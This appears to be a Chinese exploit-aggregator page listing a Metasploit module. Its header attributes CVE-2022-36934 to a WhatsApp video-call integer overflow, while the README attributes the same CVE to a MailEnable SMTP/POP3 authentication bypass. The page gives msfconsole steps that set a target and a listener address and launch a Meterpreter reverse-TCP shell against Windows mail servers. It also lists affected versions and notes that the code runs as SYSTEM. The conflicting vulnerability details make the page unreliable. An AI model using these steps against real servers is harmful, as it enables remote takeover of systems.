POC详情: ead9bfa232b8357f1507110c9a887e35107d016b

来源
关联漏洞
标题: WhatsApp 输入验证错误漏洞 (CVE-2022-36934)
描述:WhatsApp是美国WhatsApp公司的一套利用网络传送短信的移动应用程序。该应用程序通过智能手机中的联络人信息,查找使用该软件的联络人传送文字、图片等。 WhatsApp存在安全漏洞,该漏洞源于整数溢出,可能导致在已建立的视频通话中远程执行代码。
描述
Metasploit module for MailEnable CVE-2022-36934 authentication bypass RCE
介绍
# MailEnable CVE-2022-36934 Exploit Module

![Metasploit](https://img.shields.io/badge/Metasploit-Compatible-red)
![License](https://img.shields.io/badge/License-MIT-blue)

Metasploit module for MailEnable's authentication bypass vulnerability (CVE-2022-36934), leading to remote code execution.

## 📌 Features
- Exploits MailEnable's improper input sanitization in SMTP/POP3
- Supports both x86 and x64 Windows targets
- No user interaction required (auto-triggers via crafted email)
- Works against MailEnable versions < 10.40

## 🚀 Installation
1. Copy to Metasploit modules directory:
   ```bash
   cp modules/exploits/windows/smtp/mailenable_authbypass_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/smtp/

2. Reload modules in msfconsole:

  reload_all

4. Usage:

  use exploit/windows/smtp/mailenable_authbypass_rce
  set RHOSTS <target_ip>
  set LHOST <your_ip>
  set PAYLOAD windows/x64/meterpreter/reverse_tcp
  exploit



  🎯 Tested Against:

  MailEnable Professional	10.25	Windows Server 2019
  MailEnable Enterprise	10.30	Windows Server 2016

📝 Technical Details:

  Vulnerability: Authentication bypass via SQLi-like syntax in SMTP/POP3

  Attack Vector: Network (ports 25/110)

  Privileges: Runs as MailEnable service account (often SYSTEM)
  
⚠️ Legal Disclaimer:

This tool is for authorized testing only. Never use against systems you don't own or have explicit permission to test.
文件快照

[4.0K] /data/pocs/ead9bfa232b8357f1507110c9a887e35107d016b └── [1.4K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。